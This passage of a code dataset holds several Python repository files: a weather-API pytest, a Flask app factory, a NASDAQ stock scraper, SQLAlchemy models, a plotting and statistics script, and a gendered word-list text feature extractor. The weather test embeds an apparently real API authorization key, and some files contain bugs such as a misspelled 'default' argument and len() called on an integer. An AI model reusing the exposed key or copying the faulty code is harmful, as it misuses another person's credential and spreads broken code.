31, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "35221357611", "text": "import pytest\nimport requests\n\ndef test_weather_correct():\n url = \"https://opendata.cwb.gov.tw/api/v1/rest/datastore/F-D0047-061?Authorization=CWB-E0CBEB14-87B4-49A9-A4CA-A3240E63E9F4\"\n\n # 執行 API 呼叫並取得回應\n response = fetch_weather_data(url)\n\n # 確認回應的狀態碼為 200 (表示成功)\n assert response.status_code == 200\n\n # 確認回應的 JSON 資料中包含了 'records'、'locations' 和 'location' 的項目\n assert 'records' in response.json()\n assert 'locations' in response.json()['records']\n assert 'location' in response.json()['records']['locations'][0]\n\n # 取得文山區的資料\n locations = response.json()['records']['locations'][0]['location']\n wen_location = [x for x in locations if x['locationName'] == '文山區'][0]\n\n # 確認回應的 JSON 資料中包含了 'weatherElement' 的項目\n assert 'weatherElement' in wen_location\n\n # 取得天氣描述的資料\n elementNames = wen_location['weatherElement']\n WeatherDescription_elementName = [x for x in elementNames if x['elementName'] == 'WeatherDescription'][0]\n\n # 確認回應的 JSON 資料中包含了 'time' 的項目\n assert 'time' in WeatherDescription_elementName\n\n # 取得時間描述的資料\n time_descs = WeatherDescription_elementName['time']\n\n # 確認時間描述資料不為空\n assert len(time_descs) > 0\n\ndef fetch_weather_data(url):\n response = requests.get(url)\n return response\n", "repo_name": "yuu0223/FastAPI_Backend", "sub_path": "my-app/tests/test_weather.py", "file_name": "test_weather.py", "file_ext": "py", "file_size_in_byte": 1476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "4114073938", "text": "import sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom flask import Flask\nfrom flask_jsglue import JSGlue\nfrom flask_sqlalchemy_session import flask_scoped_session\n\n\ndef create_app():\n app = Flask(__name__)\n\n db_session = init_db(app)\n\n jsglue = JSGlue()\n jsglue.init_app(app)\n\n from main import bp as main_bp\n app.register_blueprint(main_bp)\n\n return app\n\n\ndef init_db(app):\n from db import Base\n engine = create_engine(url='sqlite:///./db.sqlite', convert_unicode=True, connect_args={})\n session_factory = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\n try:\n Base.metadata.create_all(bind=engine)\n except Exception as e:\n print(\"Cannot create DB, because: \", str(e), file=sys.stderr)\n\n db_session = flask_scoped_session(session_factory, app)\n Base.query = db_session.query_property()\n return db_session\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run(debug=True, host='127.0.0.1', port=2000)\n", "repo_name": "Discyo/Discyo-WebInterface", "sub_path": "web_interface/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_jsglue.JSGlue", "line_number": 15, "usage_type": "call"}, {"api_name": "main.bp", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 27, "usage_type": "call"}, {"api_name": "db.Base.metadata.create_all", "line_number": 30, "usage_type": "call"}, {"api_name": "db.Base.metadata", "line_number": 30, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy_session.flask_scoped_session", "line_number": 34, "usage_type": "call"}, {"api_name": "db.Base.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "43180279402", "text": "\"\"\"\r\n\r\nBusiness logic:\r\n\r\n1. scrape code from the web by HTTP request \r\n2. For loop with code in pandas to get data \r\n3. Save it in table and send to database (Or excel) ... storing the code status: append code into code \r\n\r\n# for append being pass to pandas and show in tables\r\n\r\n\"\"\"\r\n\r\n# 1. Scraping Teams\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport string\r\nimport re\r\n\r\n\r\n# 2. Accessing Stock data\r\nfrom datetime import datetime, timedelta\r\nimport pandas_datareader.data as web\r\n\r\n# 3. Forming DataFrame\r\nimport pandas as pd\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n\r\n# Part 1: Getting the US Stock Code \r\n\r\ncodes = [] # store codes\r\nletters = list(string.ascii_uppercase) # Setting A-Z letter list \r\n\r\nprint(\"\\033[1;32;1m Executing Mission 1 ... \\033[0m\\n\") # Green color for signal\r\n\r\nfor letter in letters:\r\n url = f\"https://eoddata.com/stocklist/NASDAQ/{letter}.htm\" # Capital A-Z according to web's pattern\r\n req = requests.get(url)\r\n soup = BeautifulSoup(req.content, 'lxml') # turn into DOM structure\r\n \r\n # filter with special pattern: stockquote/NASDAQ/...\r\n tags = soup.find_all(\"a\", href=re.compile(\"/stockquote/NASDAQ/\")) # regular expression for specified searching \r\n\r\n for t in tags: \r\n if (t.string is not None):\r\n codes.append(t.string)\r\n \r\nprint(\"\\033[1;32;1m Mission 1 Complete ! \\033[0m\\n\") \r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n# Part 2: Access data from pandas\r\n\r\ncount = 0 # successful searching\r\nerrorCount = 0 # fail searching\r\n\r\nendDate = datetime.now() # Current time system (your computer)\r\nstartDate = endDate - timedelta(days=1) # Two days before current (your computer)\r\n\r\nstr_endDate = endDate.strftime(\"%Y-%m-%d\") # date obj. to string \r\nstr_startDate = startDate.strftime(\"%Y-%m-%d\") \r\nerrorCode = [] # append to list\r\n\r\ncodeStatus = { # Open, close, and volume\r\n \"code\": [],\r\n \"date\": [],\r\n \"codeOpen ($)\": [],\r\n \"codeClose ($)\": [],\r\n \"codeVolume\": []\r\n }\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 2 ... \\033[0m\\n\")\r\n\r\nfor code in codes:\r\n try:\r\n data = web.DataReader(code, \"yahoo\", str_startDate, str_endDate) # Stock_code, search_engine, start_date, end_date\r\n # 要最新果日 (SCRARPE TIME: 香港時間 2022/01/29 01:20 AM, 但用\"2022-01-28\", \"2022-01-29\" 會顯示出27, 28 日的價(可能是時差問題))\r\n \r\n # Attracting the number of rows from the dataset\r\n for i in range(data.shape[0]): # according to its number of row\r\n stockDate = data.index[i].strftime(\"%Y-%m-%d\") # newly added, maybe wrong\r\n stockOpen = data[\"Open\"][i]\r\n stockClose = data[\"Close\"][i]\r\n stockVolume = data[\"Volume\"][i]\r\n \r\n codeStatus[\"code\"].append(code)\r\n codeStatus[\"date\"].append(stockDate)\r\n codeStatus[\"codeOpen ($)\"].append(stockOpen)\r\n codeStatus[\"codeClose ($)\"].append(stockClose)\r\n codeStatus[\"codeVolume\"].append(stockVolume)\r\n \r\n print(f\" Successful: {code}\")\r\n \r\n except:\r\n print(f\"\\033[1;31m Has probelems on -----{code} \\033[0m\") # red color for fail \r\n errorCode.append(code)\r\n \r\n \r\nprint(\"\\033[1;32;1m Mission 2 Complete ! 
\\033[0m\\n\")\r\n\r\n#----------------------------------------------------------------------------------------------\r\n\r\n# Part 3: Convert Dict to DataFrame and export to CSV file\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 3 ... \\033[0m\\n\")\r\n\r\ndf = pd.DataFrame(codeStatus)\r\ndf.to_csv(f\"stockList_{str_endDate}.csv\", index=False)\r\n# df.to_excel(f\"stockList_{str_endDate}.xlsx\", index=False) // If you want to save as excel\r\n\r\n\r\nprint(f\"Number of stock access: {count}\")\r\nprint(f\"Number of error encounter while scraping: {len(errorCount)}\")\r\nprint(errorCount) \r\n \r\n\r\nprint(\"\\033[1;32;1m Mission 3 Complete ! \\033[0m\\n\")\r\nprint(\"\\033[1;32;1m Finish !!! \\033[0m\\n\")\r\n\r\n# --------------------------------------------------------------------------------------------------\r\n\r\n\"\"\"\r\nCREATE TABLE StockObservation (\r\n id INT PRIMARY KEY AUTO INCREMENT,\r\n Date TIMESTAMP, \r\n OpenPrice DOUBLE,\r\n ClosePrice DOUBLE,\r\n VOLUME INT\r\n)\r\n\r\nSELECT * FROM StockObservation WHERE ....\r\n\"\"\"\r\n", "repo_name": "kcwu229/Investment-Analysis-Program-BetaStock", "sub_path": "Algorithmic Trading Project/Application.py", "file_name": "Application.py", "file_ext": "py", "file_size_in_byte": 4798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "string.ascii_uppercase", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas_datareader.data.DataReader", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 77, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "70010032487", "text": "from uuid import UUID, uuid4\nfrom enum import StrEnum, auto\n\nfrom sqlalchemy import Uuid, ForeignKey\nfrom sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, relationship\n\nclass Base(DeclarativeBase):\n pass\n\nclass Alcohol(StrEnum):\n VODKA = auto()\n WHISKEY = auto()\n RUM = auto()\n GIN = auto()\n TEQUILA = auto()\n BRANDY = auto()\n LIQUEUR = auto()\n\nclass Drink(Base):\n __tablename__ = \"drinkEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n base_drink: Mapped[list[Alcohol]] = mapped_column()\n name: Mapped[str] = mapped_column()\n component_ids: Mapped[list[UUID]] = mapped_column(ForeignKey(\"componentEntity.id\"))\n drinks: Mapped[\"Component\"] = relationship(back_populates=\"components\")\n \nclass Component(Base):\n __tablename__ = \"componentEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n components: Mapped[\"Drink\"] = relationship(back_populates=\"drinks\")\n", "repo_name": "Chrosto9/mixology", "sub_path": "mixology-api/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 973, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.orm.DeclarativeBase", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 10, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 11, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 12, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 14, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 15, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 16, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 22, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 25, "usage_type": "name"}, {"api_name": "uuid.UUID", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 31, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "32824013431", "text": "from __future__ import print_function\nimport utilities as DDM17\nimport pandas as pd\nimport sqlite3 as lite\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef read_visualisation_data():\n \"\"\"\n Read in the visualisation data from the database using Pandas\n\n Returns\n -------\n table_names : list\n A list of table names (or data set names)\n data : dict\n A dictionary of tables. The top-level key is the name of the data\n set. (Set1, Set2 etc.). The value of this is a pandas table with\n keys x & y. So data['Set1'] is a pandas table for instance.xs\n\n\n \"\"\"\n\n db = 'ThirteenDatasets.db'\n con = lite.connect(db)\n\n # Get the tables.\n rows = con.execute('SELECT name FROM sqlite_master WHERE type=\"table\"')\n table_names = [row[0] for row in rows]\n\n # Now loop over these and create a dict with each set.\n data = dict()\n for tname in table_names:\n t = pd.read_sql_query(\"Select x, y From {0}\".format(tname), con)\n data[tname] = t\n\n con.close()\n \n # I return both the list of table names and the\n # data dictionary mostly for convenience. \n return table_names, data\n\n\ndef data_to_pandas_df(tnames, data):\n \"\"\"Convert data dict to pandas data frame\n\n This routine takes the data dictionary from read_visualisation_data\n and creates a Pandas data frame with x & y as keys as well as a column\n with the dataset name\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to include. Normally taken to be \n the output of read_visualisation_data\n data : dict\n A dict with the data, each dataset indexed by the table name.\n This is the format returned by read_visualisation_data\n \"\"\"\n\n # Since the datasets here have the same length, I could\n # create the arrays first and then populate them - that\n # would be faster and I would avoid the asarray gymnastics\n # below to keep it as numpy arrays.\n #\n # But numpy append is fine for this.\n\n dataset = []\n first = True\n for i, tn in enumerate(tnames):\n xcoord = np.asarray(data[tn]['x'].data)\n ycoord = np.asarray(data[tn]['y'].data)\n if (first):\n x = xcoord.copy()\n y = ycoord.copy()\n first = False\n else:\n x = np.append(x, xcoord)\n y = np.append(y, ycoord)\n\n # Append the table name for each x value\n label = [tn for i in range(len(xcoord))]\n dataset = dataset + label\n\n df = pd.DataFrame({'x': x, 'y': y, 'set': dataset})\n\n return df\n \ndef show_visualisations_multipanel(tnames, data):\n \"\"\"\n Show 2D visualisations for the data\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to plot. 
Normally taken to be \n        the output of read_visualisation_data\n    data : dict\n        A dict with the data, each dataset indexed by the table name.\n        This is the format returned by read_visualisation_data\n    \n    \"\"\"\n\n    nx = 5\n    ny = 3\n    fig, axes = plt.subplots(ncols=nx, nrows=ny, figsize=(12, 8),\n                             sharex=True, sharey=True)\n    plt.tick_params(axis='both', which='major', labelsize=8)\n    dims = axes.shape\n    print(\"Axes shape=\", dims)\n    for i, tn in enumerate(tnames):\n        x, y = data[tn]['x'], data[tn]['y']\n\n        i_x, i_y = np.unravel_index(i, dims)\n        axes[i_x, i_y].scatter(x, y, 10)\n        axes[i_x, i_y].text(0.95, 0.93, tn, \n                            transform=axes[i_x, i_y].transAxes, ha='right', va='top')\n        axes[i_x, i_y].set_xlim(0, 120)\n        axes[i_x, i_y].set_ylim(0, 120)\n        \n    axes[2, 3].set_axis_off()\n    axes[2, 4].set_axis_off()\n\n    # I also want to remove white-space between the panels\n    fig.subplots_adjust(hspace=0)\n    plt.show()\n\n\ndef get_statistics(tnames, data):\n    \"\"\"Calculate basic statistics for the data\n\n    The data is assumed to be a dictionary returned from read_visualisation_data() \n    \"\"\"\n\n    # I know the number of data sets so I can make a set\n    # of result arrays. There are more elegant ways to do this\n    # for instance by using the .describe function of Pandas\n    # DataFrames, but I thought this was clearer.\n    #\n    # In general this is a less good solution though - because it\n    # hardcodes information in several places\n    n_datasets = len(tnames)\n    stats = {'x': {'mean': np.zeros(n_datasets),\n                   'median': np.zeros(n_datasets),\n                   'std': np.zeros(n_datasets),\n                   '25%': np.zeros(n_datasets),\n                   '75%': np.zeros(n_datasets),\n                   'max': np.zeros(n_datasets),\n                   'min': np.zeros(n_datasets)},\n             'y': {'mean': np.zeros(n_datasets),\n                   'median': np.zeros(n_datasets),\n                   'std': np.zeros(n_datasets),\n                   '25%': np.zeros(n_datasets),\n                   '75%': np.zeros(n_datasets),\n                   'max': np.zeros(n_datasets),\n                   'min': np.zeros(n_datasets)}}\n\n    for i, tn in enumerate(tnames):\n        for key in ('x', 'y'):\n            var = data[tn][key]\n            stats[key]['mean'][i] = np.mean(var)\n            stats[key]['median'][i] = np.median(var)\n            stats[key]['std'][i] = np.std(var)\n            stats[key]['25%'][i] = np.percentile(var, 25.)\n            stats[key]['75%'][i] = np.percentile(var, 75.)\n            stats[key]['min'][i] = np.min(var)\n            stats[key]['max'][i] = np.max(var)\n    \n\n    return stats\n\ndef get_statistics_compact(tnames, data):\n    \"\"\"\n    Equivalent to the above - shorter and a bit more flexible but\n    also probably a bit less clear?\n    \"\"\"\n\n    stats = {'x': dict(), 'y': dict()}\n\n    first = True\n    for tn in tnames:\n        summary = data[tn].describe()\n\n        # If we are doing the first round through we need to create\n        # the lists\n        todo = summary['x'].keys()\n        for key in ('x', 'y'):\n            for x_todo in todo:\n                if first:\n                    stats[key][x_todo] = []\n                stats[key][x_todo].append(summary[key][x_todo])\n        \n        first = False\n\n    return stats\n\n\ndef get_statistics_extendable(tnames, data, functions=None):\n    \"\"\"\n    Equivalent to the above two, but this one is more extendable\n\n    The functions argument should be an array of functions to\n    apply to the data. 
If this is set to None then a default set \n    of functions is applied, namely:\n\n    functions = {'mean': np.mean, 'median': np.median,\n                 '25%': lambda x: np.percentile(x, 25.0),\n                 '75%': lambda x: np.percentile(x, 75.0)}\n    \"\"\"\n\n    stats = {'x': dict(), 'y': dict()}\n    if functions is None:\n        functions = {'mean': np.mean, 'median': np.median,\n                     '25%': lambda x: np.percentile(x, 25.0),\n                     '75%': lambda x: np.percentile(x, 75.0)}\n    n_datasets = len(tnames)\n    first = True\n    for i, tn in enumerate(tnames):\n        for key in ('x', 'y'):\n            var = data[tn][key]\n            \n            for todo, func in functions.items():\n                if first:\n                    stats[key][todo] = np.zeros(n_datasets)\n                stats[key][todo][i] = func(var)\n            \n        first = False\n\n    return stats\n\n\nif __name__ == \"__main__\":\n    # execute only if run as a script\n    tnames, data = read_visualisation_data()\n\n    show_visualisations_multipanel(tnames, data)\n", "repo_name": "jbrinchmann/MLD2019", "sub_path": "ProblemSets/2 - Inference and Visualisation/Solution/problem2_2.py", "file_name": "problem2_2.py", "file_ext": "py", "file_size_in_byte": 7580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.unravel_index", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 164, "usage_type": 
"call"}, {"api_name": "numpy.percentile", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.percentile", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}]}
+{"seq_id": "13945849021", "text": "import nltk\n\ndef genderDifferencesFeatures(text):\n\n\tgroom = \"\"\"cleaner clean washer wash perfume shave shaved shampoo cleansing soap shower\n\ttoothpaste cream facewash moisturizer nail lipstick makeup\"\"\"\n\n\tsleep = \"\"\"tiresome sleeping dazed sleeps insomnia napping nap siesta nightmare dream dreams bed\n\tpillow\"\"\"\n\n\ti = \"\"\"me myself mine my i\"\"\"\n\n\teating = \"\"\"fat dinner tasting drunken fed breakfast cookie eat tasted skinny cookbook\"\"\"\n\n\tdisgust = \"\"\"sickening revolting horror sick offensive obscene nauseous wicked\"\"\"\n\n\tfear = \"\"\"suspense creep dismay fright terrible terror afraid scare alarmed panicked panic\"\"\"\n\n\tsewing = \"\"\"mending stiching knitting knitter knit mend tailor suture embroidery seamstress needle\"\"\"\n\n\tpurpleness = \"\"\"purple mauve magenta lilac lavender orchid violet mulberry purply\"\"\"\n\n\tsweetness = \"\"\"syrup honey sugar bakery nectar sweet frost sugary dessert glaze nut\"\"\"\n\n\tbrownness = \"\"\"coffee biscuit biscuits walnut rust berry brown brunette cinnamon mahogany caramel chocolate\"\"\"\n\n\tchastity = \"\"\"shame elegant decent virtue virgin delicate faithful faithfulness platonic purity spotless\"\"\"\n\n\trelig = \"\"\"bless satanism angel communion spirit lord immortal theology prayers\"\"\"\n\n\tmetaph = \"\"\"suicide meditation cemetary temples drained immortalized mercy mourning\"\"\"\n\n\ttv = \"\"\"show ad comedies comedy tv actors drama soaps video theatres commercials commercial film films\"\"\"\n\n\tjob = \"\"\"credentials department financials desktop manage employee work career\"\"\"\n\n\toponent = \"\"\"finalist rival enemy competitor foe opposite defendant player dissident\"\"\"\n\n\ttheology = \"\"\"creed scholastic religious secularism theology religion divine faith dogma\"\"\"\n\n\tuniformity = \"\"\"evenness constancy constant persistence accordance steadiness steady firm firmness stable stability\"\"\"\n\n\tengineering = \"\"\"automotive process industrial manufacture measure construction technician\"\"\"\n\n\tinfluence = \"\"\"power force weak weakness inflexible ineffective charisma charm wimpy\"\"\"\n\n\t\n\tcountGroom = countSleep = countI = countEating = countDisgust = countFear = countSewing = 0\n\tcountPurpleness = countSweetness = countBrownness = countChastity = countRelig = countInfluence = 0\n\tcountMetaph = countTV = countJob = countOponent = countTheology = countUniformity = countEngineering = 0\n\n\ttotalWords = len(text.split())\n\t#print(totalWords)\n\n\ttext = text.lower()\n\ttext = nltk.word_tokenize(text)\n\tgroom = nltk.word_tokenize(groom)\n\tsleep = nltk.word_tokenize(sleep)\n\ti = nltk.word_tokenize(i)\n\teating = nltk.word_tokenize(eating)\n\tdisgust = nltk.word_tokenize(disgust)\n\tfear = nltk.word_tokenize(fear)\n\tsewing = nltk.word_tokenize(sewing)\n\tpurpleness = nltk.word_tokenize(purpleness)\n\tsweetness = nltk.word_tokenize(sweetness)\n\tbrownness = nltk.word_tokenize(brownness)\n\tchastity = nltk.word_tokenize(chastity)\n\trelig = nltk.word_tokenize(relig)\n\tinfluence = nltk.word_tokenize(influence)\n\tmetaph = nltk.word_tokenize(metaph)\n\ttv = nltk.word_tokenize(tv)\n\tjob = nltk.word_tokenize(job)\n\toponent = nltk.word_tokenize(oponent)\n\ttheology = nltk.word_tokenize(theology)\n\tuniformity = nltk.word_tokenize(uniformity)\n\tengineering = nltk.word_tokenize(engineering)\n\t\n\n\tfor word in text:\n\t\tif word in groom:\n\t\t\tcountGroom += 1\n\n\t\tif word in sleep:\n\t\t\tcountSleep += 
1\n\n\t\tif word in i:\n\t\t\tcountI += 1\n\n\t\tif word in eating:\n\t\t\tcountEating += 1\n\n\t\tif word in disgust:\n\t\t\tcountDisgust += 1\n\n\t\tif word in fear:\n\t\t\tcountFear += 1\n\n\t\tif word in sewing:\n\t\t\tcountSewing += 1\n\n\t\tif word in purpleness:\n\t\t\tcountPurpleness += 1\n\n\t\tif word in sweetness:\n\t\t\tcountSweetness += 1\n\n\t\tif word in brownness:\n\t\t\tcountBrownness += 1\n\n\t\tif word in chastity:\n\t\t\tcountChastity += 1\n\n\t\tif word in relig:\n\t\t\tcountRelig += 1\n\n\t\tif word in metaph:\n\t\t\tcountMetaph += 1\n\n\t\tif word in tv:\n\t\t\tcountTV += 1\n\n\t\tif word in job:\n\t\t\tcountJob += 1\n\n\t\tif word in oponent:\n\t\t\tcountOponent += 1\n\n\t\tif word in theology:\n\t\t\tcountTheology += 1\n\n\t\tif word in uniformity:\n\t\t\tcountUniformity += 1\n\n\t\tif word in engineering:\n\t\t\tcountEngineering += 1\n\n\t\tif word in influence:\n\t\t\tcountInfluence += 1\n\n\ttry:\n\t\tcountGroom /= 1.0 * totalWords\n\texcept:\n\t\tcountGroom = 0\n\ttry:\n\t\tcountSleep /= 1.0 * totalWords\n\texcept:\n\t\tcountSleep = 0\n\ttry:\n\t\tcountI /= 1.0 * totalWords\n\texcept:\n\t\tcountI = 0\n\ttry:\n\t\tcountEating /= 1.0 * totalWords\n\texcept:\n\t\tcountEating = 0\n\ttry:\n\t\tcountDisgust /= 1.0 *totalWords\n\texcept:\n\t\tcountDisgust = 0\n\ttry:\n\t\tcountFear /= 1.0 * totalWords\n\texcept:\n\t\tcountFear = 0\n\ttry:\n\t\tcountSewing /= 1.0 * totalWords\n\texcept:\n\t\tcountSewing = 0\n\ttry:\n\t\tcountPurpleness /= 1.0 * totalWords\n\texcept:\n\t\tcountPurpleness = 0\n\ttry:\n\t\tcountBrownness /= 1.0 * totalWords\n\texcept:\n\t\tcountBrownness = 0\n\ttry:\n\t\tcountSweetness /= 1.0 * totalWords\n\texcept:\n\t\tcountSweetness = 0\n\ttry:\n\t\tcountChastity /= 1.0 * totalWords\n\texcept:\n\t\tcountChastity = 0\n\ttry:\n\t\tcountRelig /= 1.0 * totalWords\n\texcept:\n\t\tcountRelig = 0\n\ttry:\n\t\tcountMetaph /= 1.0 * totalWords\n\texcept:\n\t\tcountMetaph = 0\n\ttry:\n\t\tcountJob /= 1.0 * totalWords\n\texcept:\n\t\tcountJob = 0\n\ttry:\n\t\tcountTV /= 1.0 * totalWords\n\texcept:\n\t\tcountTV = 0\n\ttry:\n\t\tcountOponent /= 1.0 * totalWords\n\texcept:\n\t\tcountOponent = 0\n\ttry:\n\t\tcountTheology /= 1.0 * totalWords\n\texcept:\n\t\tcountTheology = 0\n\ttry:\n\t\tcountUniformity /= 1.0 * totalWords\n\texcept:\n\t\tcountUniformity = 0\n\ttry:\n\t\tcountEngineering /= 1.0 * totalWords\n\texcept:\n\t\tcountEngineering = 0\n\ttry:\n\t\tcountInfluence /= 1.0 * totalWords\n\texcept:\n\t\tcountInfluence = 0\n\n\treturn(countGroom, countSleep, countI, countEating, countDisgust, countFear, countSewing, countPurpleness,\n\t\tcountSweetness, countBrownness, countChastity, countRelig, countMetaph, countJob, countTV, countOponent,\n\t\tcountTheology, countUniformity, countEngineering, countInfluence)\n\ntext = \"\"\"This is hopeless countless priceless and I am indecisive. 
